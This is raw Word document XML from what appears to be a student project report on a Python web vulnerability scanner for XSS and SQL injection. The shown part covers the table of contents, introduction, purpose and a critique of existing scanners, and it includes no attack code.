              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:t>UCD (Use Case Diagram)</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25413 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>20</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_Toc27671 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:t>DFD (Data Flow Diagram)</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc27671 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>21</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_Toc8741 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t xml:space="preserve">Design </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:lang w:val="en-IN"/>
            </w:rPr>
            <w:t>:</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc8741 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>26</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_Toc2038 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t>Coding</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2038 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>28</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_Toc10020 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t>Future Scope</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc10020 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>33</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pStyle w:val="18"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:szCs w:val="20"/>
              <w:u w:val="single"/>
              <w14:textFill>
                <w14:solidFill>
                  <w14:schemeClr w14:val="tx1"/>
                </w14:solidFill>
              </w14:textFill>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc21802 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t>References</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21802 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>34</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:szCs w:val="20"/>
              <w:u w:val="single"/>
              <w14:textFill>
                <w14:solidFill>
                  <w14:schemeClr w14:val="tx1"/>
                </w14:solidFill>
              </w14:textFill>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="44"/>
              <w:u w:val="single"/>
              <w14:textFill>
                <w14:solidFill>
                  <w14:schemeClr w14:val="tx1"/>
                </w14:solidFill>
              </w14:textFill>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:szCs w:val="20"/>
              <w:u w:val="single"/>
              <w14:textFill>
                <w14:solidFill>
                  <w14:schemeClr w14:val="tx1"/>
                </w14:solidFill>
              </w14:textFill>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="44"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId6" w:type="default"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="810" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgBorders w:offsetFrom="page">
            <w:top w:val="single" w:color="auto" w:sz="18" w:space="24"/>
            <w:left w:val="single" w:color="auto" w:sz="18" w:space="24"/>
            <w:bottom w:val="single" w:color="auto" w:sz="18" w:space="24"/>
            <w:right w:val="single" w:color="auto" w:sz="18" w:space="24"/>
          </w:pgBorders>
          <w:pgNumType w:fmt="decimal" w:start="1"/>
          <w:cols w:space="708" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc5390"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Introduction to Proj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ct</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>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360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_ogp52fyi6djo" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkStart w:id="6" w:name="_Toc43339131"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">This project focuses on developing a web-based </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerability </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">scanner </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">made in Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>aimed at identifying and reporting vulnerabilities in web applications. This Project has the following main functionalit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ies :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Scanning for XSS and SQL specific vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Crawling URLs using Selenium and Chrome web driver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Automate login process while scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Support of multi-thread environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc13884"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Purpose of Project</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc43339132"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_gjdgxs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web-applications are often subject to attacks from hackers for a variety of reasons, from gathering data stored by the website to replacing files served with malicious ones. There</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>is a large range of well-known vulnerabilities in web-applications that can be used to attack a site, and it is vital that these are detected before they are exploited. In this dissertation, I present</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a web-application vulnerability scanner for automated detection and reporting of common website Vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. Many common vulnerabilities go unknown by website developers, as well as the methods for their mitigation and prevention. This leads to many severe issues being present on websites, likely to be un-patched until they are exploited and cause major damage to the site owners. A common way to avoid being vulnerable to such attacks is to hire a penetration tester, to attempt to break into the website or server and report any vulnerabilities found so that the application developers can fix them. In this project, I aim to create a tool that scans for a variety of common website vulnerabilities, focusing on the most commonly reported vulnerability, XSS, and one of the most dangerous vulnerabilities, SQL. The core design feature is extensibility, such that new vulnerability tests can be easily added in the future.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Verdana" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc25296"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">Problems in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">xisting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ystem</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc15405"/>
      <w:bookmarkStart w:id="12" w:name="_Toc12490"/>
      <w:bookmarkStart w:id="13" w:name="_Toc32267"/>
      <w:bookmarkStart w:id="14" w:name="_Toc43339133"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>High Competition Leading to Lower Quality:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>The IT sector is highly competitive, often leading to compromised quality in the services provided by many vulnerability scanners.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc154"/>
      <w:bookmarkStart w:id="16" w:name="_Toc9339"/>
      <w:bookmarkStart w:id="17" w:name="_Toc21689"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Expensive Premium Memberships:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Many existing vulnerability scanners charge exorbitant fees for premium memberships, making them inaccessible to smaller organizations or individual developers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc4660"/>
      <w:bookmarkStart w:id="19" w:name="_Toc13235"/>
      <w:bookmarkStart w:id="20" w:name="_Toc6481"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Lack of Customizable Inputs:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
